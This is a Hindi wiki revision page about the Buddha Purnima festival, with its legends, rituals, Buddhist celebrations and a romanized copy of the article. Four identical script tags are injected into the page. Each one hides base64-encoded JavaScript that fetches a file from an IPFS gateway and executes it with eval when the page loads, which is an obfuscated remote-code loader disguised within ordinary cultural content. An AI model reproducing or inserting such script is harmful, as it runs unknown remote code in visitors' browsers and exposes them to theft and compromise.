Difference between revisions of "बुद्ध पूर्णिमा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 23: Line 23:
 
'''बुद्ध पूर्णिमा''' वैशाख पूर्णिमा को मनाई जाती है। इसे 'बुद्ध जयंती' के नाम से भी जाना जाता है। यह [[बौद्ध धर्म]] में आस्था रखने वालों का एक प्रमुख त्यौहार है। [[पूर्णिमा]] के दिन ही [[गौतम बुद्ध]] का स्वर्गारोहण समारोह भी मनाया जाता है। मान्यता है कि इसी दिन भगवान बुद्ध को 'बुद्धत्व' की प्राप्ति हुई थी। आज बौद्ध धर्म को मानने वाले विश्व में 50 करोड़ से अधिक लोग इस दिन को बड़ी धूमधाम से मनाते हैं। बुद्ध पूर्णिमा के [[दिन]] दान-पुण्य और धर्म-कर्म के अनेक कार्य किए जाते हैं। यह [[स्नान]] लाभ की दृष्टि से अंतिम पर्व है। इस दिन मिष्ठान, [[सत्तू]], जलपात्र, [[वस्त्र]] दान करने तथा [[पितर|पितरों]] का [[तर्पण (श्राद्ध)|तर्पण]] करने से बहुत पुण्य की प्राप्ति होती है।
 
'''बुद्ध पूर्णिमा''' वैशाख पूर्णिमा को मनाई जाती है। इसे 'बुद्ध जयंती' के नाम से भी जाना जाता है। यह [[बौद्ध धर्म]] में आस्था रखने वालों का एक प्रमुख त्यौहार है। [[पूर्णिमा]] के दिन ही [[गौतम बुद्ध]] का स्वर्गारोहण समारोह भी मनाया जाता है। मान्यता है कि इसी दिन भगवान बुद्ध को 'बुद्धत्व' की प्राप्ति हुई थी। आज बौद्ध धर्म को मानने वाले विश्व में 50 करोड़ से अधिक लोग इस दिन को बड़ी धूमधाम से मनाते हैं। बुद्ध पूर्णिमा के [[दिन]] दान-पुण्य और धर्म-कर्म के अनेक कार्य किए जाते हैं। यह [[स्नान]] लाभ की दृष्टि से अंतिम पर्व है। इस दिन मिष्ठान, [[सत्तू]], जलपात्र, [[वस्त्र]] दान करने तथा [[पितर|पितरों]] का [[तर्पण (श्राद्ध)|तर्पण]] करने से बहुत पुण्य की प्राप्ति होती है।
 
==सत्य विनायक पूर्णिमा==
 
==सत्य विनायक पूर्णिमा==
यह 'सत्य विनायक पूर्णिमा' भी मानी जाती है। [[श्रीकृष्ण]] के बचपन के श्रीकृष्ण दरिद्र [[ब्राह्मण]] [[सुदामा]] जब [[द्वारिका]] उनके पास मिलने पहुंचे तो श्रीकृष्ण ने उनको सत्यविनायक व्रत का विधान बताया। इसी व्रत के प्रभाव से सुदामा की सारी दरिद्रता जाती रही तथा वह सर्वसुख सम्पन्न और ऐश्वर्यशाली हो गया। इस दिन [[धर्मराज]] की पूजा करने का विधान है। इस व्रत से धर्मराज की प्रसन्नता प्राप्त होती है और अकाल मृत्यु का भय नहीं रहता। [[वैशाख]] की [[पूर्णिमा]] को ही [[विष्णु|भगवान विष्णु]] के नौवें अवतार [[बुद्ध|भगवान बुद्ध]] के रूप में हुआ था। इसी दिन भगवान बुद्ध का निर्वाण हुआ था। उनके अनुयायी इस दिवस को बहुत धूमधाम से मनाते हैं।  
+
यह 'सत्य विनायक पूर्णिमा' भी मानी जाती है। भगवान [[श्रीकृष्ण]] के बचपन के दरिद्र मित्र [[ब्राह्मण]] [[सुदामा]] जब [[द्वारिका]] उनके पास मिलने पहुंचे तो श्रीकृष्ण ने उनको सत्यविनायक व्रत का विधान बताया। इसी व्रत के प्रभाव से सुदामा की सारी दरिद्रता जाती रही तथा वह सर्वसुख सम्पन्न और ऐश्वर्यशाली हो गया। इस दिन [[धर्मराज]] की [[पूजा]] करने का विधान है। इस व्रत से धर्मराज की प्रसन्नता प्राप्त होती है और अकाल मृत्यु का भय नहीं रहता। [[वैशाख]] की [[पूर्णिमा]] को ही [[विष्णु|भगवान विष्णु]] का नौवाँ [[अवतार]] [[बुद्ध|भगवान बुद्ध]] के रूप में हुआ था। इसी दिन भगवान बुद्ध का निर्वाण हुआ था। उनके अनुयायी इस दिवस को बहुत धूमधाम से मनाते हैं।
 
==उत्सव और अनुष्ठान==
 
==उत्सव और अनुष्ठान==
इस दिन अलग-अलग पुण्य कर्म करने से अलग-अलग फलों की प्राप्ति होती है। धर्मरात के निमित्त जलपूर्ण कलश और पकवान दान करने से गोदान के समान फल प्राप्त होता है। पांच या सात ब्राह्मणों को मीठे [[तिल]] दान देने से सब पापों का क्षय हो जाता है। यदि तिलों के [[जल]] से स्नान करके [[घी]], चीनी और तिलों से भरा पात्र भगवान विष्णु को निवेदन करें और उन्हीं से [[अग्नि]] में आहुति दें अथवा तिल और [[शहद]] का दान करें, तिल के तेल के [[दीपक]] जलाएं, जल और तिलों का तर्पण करें अथवा [[गंगा]] आदि में स्नान करें तो व्यक्ति सब पापों से निवृत्त हो जाता है। इस दिन शुद्ध भूमि पर तिल फैलाकर काले मृग का चर्म बिछाएं तथा उसे सभी प्रकार के वस्त्रों सहित दान करें तो अनंत फल प्राप्त होता है। यदि इस दिन एक समय भोजन करके [[पूर्णिमा]], [[चंद्रमा]] अथवा [[सत्यनारायण व्रत|सत्यनारायण का व्रत]] करें तो सब प्रकार के सुख, सम्पदा और श्रेय की प्राप्ति होती है।  
+
'बुद्ध पूर्णिमा' के दिन अलग-अलग पुण्य कर्म करने से अलग-अलग फलों की प्राप्ति होती है। धर्मराज के निमित्त जलपूर्ण कलश और पकवान दान करने से गोदान के समान फल प्राप्त होता है। पांच या सात ब्राह्मणों को मीठे [[तिल]] दान देने से सब पापों का क्षय हो जाता है। यदि तिलों के [[जल]] से स्नान करके [[घी]], चीनी और तिलों से भरा पात्र भगवान विष्णु को निवेदन करें और उन्हीं से [[अग्नि]] में आहुति दें अथवा तिल और [[शहद]] का दान करें, तिल के तेल के [[दीपक]] जलाएं, [[जल]] और तिलों का तर्पण करें अथवा [[गंगा]] आदि में स्नान करें तो व्यक्ति सब पापों से निवृत्त हो जाता है। इस दिन शुद्ध भूमि पर तिल फैलाकर काले मृग का चर्म बिछाएं तथा उसे सभी प्रकार के वस्त्रों सहित दान करें तो अनंत फल प्राप्त होता है। यदि इस दिन एक समय भोजन करके [[पूर्णिमा]], [[चंद्रमा]] अथवा [[सत्यनारायण व्रत|सत्यनारायण का व्रत]] करें तो सब प्रकार के सुख, सम्पदा और श्रेय की प्राप्ति होती है।
 +
====समारोह====
 +
[[बौद्ध धर्म]] के अनुयायियों के लिए 'बुद्ध पूर्णिमा' सबसे बड़ा त्योहार का दिन होता है। इस दिन सारे विश्व में जहाँ कहीं भी बौद्ध धर्म के मानने वाले रहते हैं, वहाँ अनेक प्रकार के समारोह आयोजित किए जाते हैं। अलग-अलग देशों में वहाँ के रीति-रिवाजों और संस्कृति के अनुसार समारोह आयोजित होते हैं।<ref>{{cite web |url=http://hindi.webdunia.com/%E0%A4%AC%E0%A5%81%E0%A4%A6%E0%A5%8D%E0%A4%A7-%E0%A4%AA%E0%A5%82%E0%A4%B0%E0%A5%8D%E0%A4%A3%E0%A4%BF%E0%A4%AE%E0%A4%BE-%E0%A4%AC%E0%A5%81%E0%A4%A6%E0%A5%8D%E0%A4%A7/%E0%A4%AC%E0%A5%81%E0%A4%A6%E0%A5%8D%E0%A4%A7-%E0%A4%AA%E0%A5%82%E0%A4%B0%E0%A5%8D%E0%A4%A3%E0%A4%BF%E0%A4%AE%E0%A4%BE-%E0%A4%AF%E0%A4%BE-%E0%A4%AC%E0%A5%81%E0%A4%A6%E0%A5%8D%E0%A4%A7-%E0%A4%9C%E0%A4%AF%E0%A4%82%E0%A4%A4%E0%A5%80-1090506117_1.htm|title=बुद्ध पूर्णिमा या बुद्ध जयंती|accessmonthday=14 मई|accessyear= 2014|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
  
 +
#श्रीलंकाई इस दिन को 'वेसाक उत्सव' के रूप में मनाते हैं, जो '[[वैशाख]]' शब्द का अपभ्रंश है।
 +
#इस दिन बौद्ध घरों में [[दीपक]] जलाए जाते हैं और फूलों से घरों को सजाया जाता है।
 +
#दुनिया भर से [[बौद्ध धर्म]] के अनुयायी [[बोधगया]] आते हैं और प्रार्थनाएँ करते हैं।
 +
#बौद्ध धर्म के धर्मग्रंथों का निरंतर पाठ किया जाता है।
 +
#मंदिरों व घरों में अगरबत्ती लगाई जाती है। मूर्ति पर [[फल]]-[[फूल]] चढ़ाए जाते हैं और दीपक जलाकर [[पूजा]] की जाती है।
 +
#बोधिवृक्ष की पूजा की जाती है। उसकी शाखाओं पर हार व रंगीन पताकाएँ सजाई जाती हैं। जड़ों में [[दूध]] व सुगंधित पानी डाला जाता है। वृक्ष के आसपास दीपक जलाए जाते हैं।
 +
#इस दिन मांसाहार का परहेज होता है, क्योंकि बुद्ध पशु हिंसा के विरोधी थे।
 +
#इस दिन किए गए अच्छे कार्यों से पुण्य की प्राप्ति होती है।
 +
#पक्षियों को पिंजरे से मुक्त कर खुले आकाश में छोड़ा जाता है।
 +
#गरीबों को भोजन व वस्त्र दिए जाते हैं।
 +
#दिल्ली संग्रहालय इस दिन बुद्ध की अस्थियों को बाहर निकालता है, जिससे कि बौद्ध धर्मावलंबी वहाँ आकर प्रार्थना कर सकें।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 06:02, 14 May 2014

buddh poornima
any nam vaishakh poornima, saty vinayak poornima
anuyayi bauddh, hiandoo
uddeshy buddh poornima ke din dan-puny aur dharm-karm ke anek kary kie jate haian.
tithi vaishakh ki poornima
dharmik manyata buddh poornima ko hi bhagavan vishnu ke nauvean avatar ke roop mean bhagavan buddh avatarit hue the aur isi din bhagavan buddh ka nirvan hua tha.
any janakari yadi is din ek samay bhojan karake poornima, chandrama athava satyanarayan ka vrat karean to sab prakar ke sukh, sampada aur shrey ki prapti hoti hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

buddh poornima vaishakh poornima ko manaee jati hai. ise 'buddh jayanti' ke nam se bhi jana jata hai. yah bauddh dharm mean astha rakhane valoan ka ek pramukh tyauhar hai. poornima ke din hi gautam buddh ka svargarohan samaroh bhi manaya jata hai. manyata hai ki isi din bhagavan buddh ko 'buddhatv' ki prapti huee thi. aj bauddh dharm ko manane vale vishv mean 50 karo d se adhik log is din ko b di dhoomadham se manate haian. buddh poornima ke din dan-puny aur dharm-karm ke anek kary kie jate haian. yah snan labh ki drishti se aantim parv hai. is din mishthan, sattoo, jalapatr, vastr dan karane tatha pitaroan ka tarpan karane se bahut puny ki prapti hoti hai.

saty vinayak poornima

yah 'saty vinayak poornima' bhi mani jati hai. bhagavan shrikrishna ke bachapan ke daridr mitr brahman sudama jab dvarika unake pas milane pahuanche to shrikrishna ne unako satyavinayak vrat ka vidhan bataya. isi vrat ke prabhav se sudama ki sari daridrata jati rahi tatha vah sarvasukh sampann aur aishvaryashali ho gaya. is din dharmaraj ki pooja karane ka vidhan hai. is vrat se dharmaraj ki prasannata prapt hoti hai aur akal mrityu ka bhay nahian rahata. vaishakh ki poornima ko hi bhagavan vishnu ka nauvaan avatar bhagavan buddh ke roop mean hua tha. isi din bhagavan buddh ka nirvan hua tha. unake anuyayi is divas ko bahut dhoomadham se manate haian.

utsav aur anushthan

'buddh poornima' ke din alag-alag puny karm karane se alag-alag phaloan ki prapti hoti hai. dharmaraj ke nimitt jalapoorn kalash aur pakavan dan karane se godan ke saman phal prapt hota hai. paanch ya sat brahmanoan ko mithe til dan dene se sab papoan ka kshay ho jata hai. yadi tiloan ke jal se snan karake ghi, chini aur tiloan se bhara patr bhagavan vishnu ko nivedan karean aur unhian se agni mean ahuti dean athava til aur shahad ka dan karean, til ke tel ke dipak jalaean, jal aur tiloan ka tarpan karean athava ganga adi mean snan karean to vyakti sab papoan se nivritt ho jata hai. is din shuddh bhoomi par til phailakar kale mrig ka charm bichhaean tatha use sabhi prakar ke vastroan sahit dan karean to anant phal prapt hota hai. yadi is din ek samay bhojan karake poornima, chandrama athava satyanarayan ka vrat karean to sab prakar ke sukh, sampada aur shrey ki prapti hoti hai.

samaroh

bauddh dharm ke anuyayiyoan ke lie 'buddh poornima' sabase b da tyohar ka din hota hai. is din sare vishv mean jahaan kahian bhi bauddh dharm ke manane vale rahate haian, vahaan anek prakar ke samaroh ayojit kie jate haian. alag-alag deshoan mean vahaan ke riti-rivajoan aur sanskriti ke anusar samaroh ayojit hote haian.[1]

  1. shrilankaee is din ko 'vesak utsav' ke roop mean manate haian, jo 'vaishakh' shabd ka apabhransh hai.
  2. is din bauddh gharoan mean dipak jalae jate haian aur phooloan se gharoan ko sajaya jata hai.
  3. duniya bhar se bauddh dharm ke anuyayi bodhagaya ate haian aur prarthanaean karate haian.
  4. bauddh dharm ke dharmagranthoan ka nirantar path kiya jata hai.
  5. mandiroan v gharoan mean agarabatti lagaee jati hai. moorti par phal-phool chadhae jate haian aur dipak jalakar pooja ki jati hai.
  6. bodhivriksh ki pooja ki jati hai. usaki shakhaoan par har v rangin patakaean sajaee jati haian. j doan mean doodh v sugandhit pani dala jata hai. vriksh ke asapas dipak jalae jate haian.
  7. is din maansahar ka parahej hota hai, kyoanki buddh pashu hiansa ke virodhi the.
  8. is din kie ge achchhe karyoan se puny ki prapti hoti hai.
  9. pakshiyoan ko pianjare se mukt kar khule akash mean chho da jata hai.
  10. gariboan ko bhojan v vastr die jate haian.
  11. dilli sangrahalay is din buddh ki asthiyoan ko bahar nikalata hai, jisase ki bauddh dharmavalanbi vahaan akar prarthana kar sakean.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. buddh poornima ya buddh jayanti (hindi). . abhigaman tithi: 14 mee, 2014.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>